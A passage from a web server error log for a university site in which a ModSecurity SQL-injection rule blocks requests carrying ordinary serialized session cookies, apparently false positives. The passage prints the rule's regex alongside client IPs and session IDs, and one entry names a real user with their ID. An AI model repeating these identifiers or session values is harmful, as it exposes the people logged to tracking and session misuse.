a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOzRosCo-f0AANpGP5kAAAAS"]
[Mon Aug 28 23:56:03.138762 2023] [:error] [pid 55879] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOzRo8Co-f0AANpHjUMAAAAT"]
[Mon Aug 28 23:56:03.387138 2023] [:error] [pid 55879] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOzRo8Co-f0AANpHjUQAAAAT"]
[Mon Aug 28 23:56:19.030743 2023] [:error] [pid 55878] [client 168.235.206.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzRs8Co-f0AANpGP5oAAAAS"]
[Mon Aug 28 23:56:19.371856 2023] [:error] [pid 55875] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzRs8Co-f0AANpDyPUAAAAP"]
[Mon Aug 28 23:56:20.373568 2023] [:error] [pid 55748] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22262a80182278b37ba069e815ead56a72\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22168.235.206.126\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; U; Android 10; en-US; Redmi 8 \\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241761\\x22;}f40109b8daa6f113aa23f6ec9a05b110"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzRtMCo-f0AANnEOjgAAAAB"]
[Mon Aug 28 23:57:05.253083 2023] [:error] [pid 55742] [client 116.206.15.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:10:{s:10:\\x22session_id\\x22;s:32:\\x22d9ba45131f8c3872c54718e6323595a0\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22116.206.14.25\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693238843\\x22;s:20:\\x22status_aktifasi1unla\\x22;s:1:\\x221\\x22;s:12:\\x22user_id1unla\\x22;s:14:\\x2241155050190090\\x22;s:13:\\x22username1unla\\x22;s:19:\\x22NANDA MARTA SUNARYA\\x22;s:17:\\x22level_member1un..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [ [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzR4cCo-f0AANm@U7YAAAAJ"]
[Mon Aug 28 23:57:23.177584 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOzR88Co-f0AANpfcXwAAAAF"]
[Mon Aug 28 23:57:23.194699 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOzR88Co-f0AANnDyQkAAAAD"]
[Mon Aug 28 23:57:23.198443 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOzR88Co-f0AANpfcX0AAAAF"]
[Mon Aug 28 23:57:23.199671 2023] [:error] [pid 55904] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOzR88Co-f0AANpg7HIAAAAH"]
[Mon Aug 28 23:57:23.200584 2023] [:error] [pid 55742] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOzR88Co-f0AANm@U8EAAAAJ"]
[Mon Aug 28 23:57:23.200698 2023] [:error] [pid 55745] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOzR88Co-f0AANnBglcAAAAK"]
[Mon Aug 28 23:57:23.203055 2023] [:error] [pid 55902] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOzR88Co-f0AANpel@MAAAAC"]
[Mon Aug 28 23:57:23.210570 2023] [:error] [pid 55747] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOzR88Co-f0AANnDyQoAAAAD"]
[Mon Aug 28 23:57:23.213288 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOzR88Co-f0AANpfcX4AAAAF"]
[Mon Aug 28 23:57:23.217541 2023] [:error] [pid 55904] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOzR88Co-f0AANpg7HMAAAAH"]
[Mon Aug 28 23:57:23.218650 2023] [:error] [pid 55745] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOzR88Co-f0AANnBglgAAAAK"]
[Mon Aug 28 23:57:23.227396 2023] [:error] [pid 55742] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOzR88Co-f0AANm@U8IAAAAJ"]
[Mon Aug 28 23:57:23.252751 2023] [:error] [pid 55903] [client 103.191.196.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22c7049d1b605e408e540e13ca1d5a5219\\x22;s:10:\\x22ip_address\\x22;s:14:\\x22103.191.196.58\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241842\\x22;}c5c8f4e6ce7b94dd62a18f5933fc43d5"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri 